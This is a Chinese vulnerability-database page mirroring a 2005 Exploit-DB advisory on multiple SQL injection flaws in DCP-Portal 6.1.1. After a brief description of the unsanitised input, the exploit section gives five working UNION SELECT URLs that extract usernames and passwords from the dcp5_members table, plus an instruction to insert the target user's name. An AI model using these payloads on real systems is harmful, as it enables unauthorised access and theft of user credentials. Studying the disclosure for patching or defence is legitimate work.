DCP-Portal 6.1.1 – Multiple SQL Injections

DCP-Portal 6.1.1 – Multiple SQL Injections

漏洞ID 1054906 漏洞类型
发布时间 2005-02-16 更新时间 2005-02-16
图片[1]-DCP-Portal 6.1.1 – Multiple SQL Injections-安全小百科CVE编号 N/A
图片[2]-DCP-Portal 6.1.1 – Multiple SQL Injections-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/25109
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/12573/info

DCP-Portal is reportedly affected by multiple SQL injection vulnerabilities. These issues exist because the application fails to properly sanitize user-supplied input before using it in SQL queries.

Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.

These vulnerabilities are reported to affect DCP-Portal 6.1.1; earlier versions may also be affected. 

http://www.example.com/index.php?page=links&catid=1&lcat=-99%27 UNION SELECT null,password FROM dcp5_members WHERE username=%27[username]

http://www.example.com/index.php?page=documents&doc=-99%27 UNION SELECT null,null,username,password, null,null,null,null,null,null,null,null FROM dcp5_members WHERE username=%27[username]

http://www.example.com/index.php?page=mdetails&uid=-99%27 UNION SELECT null,null,null,username,null, null,null,null,password,null,null,null,null,null,null,null,null,null,null,null,null FROM dcp5_members WHERE username=%27[username]

http://server.com/forums.php?action=showmsg&mid=-99%27 UNION SELECT null,null,null,password,null, username,null,null,null FROM dcp5_members WHERE username=%27[username]

http://server.com/forums.php?action=board&bid=-99%27UNION SELECT null,null,password,null FROM dcp5_members WHERE username=%27[username]

Replace [username] in the above examples with the user name you wish to retrieve the password for.

相关推荐: WebStore shopping cart CGI程序“web_store.cgi”配置错误漏洞

WebStore shopping cart CGI程序“web_store.cgi”配置错误漏洞 漏洞ID 1207066 漏洞类型 未知 发布时间 1999-04-20 更新时间 1999-04-20 CVE编号 CVE-1999-0604 CNNVD-I…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享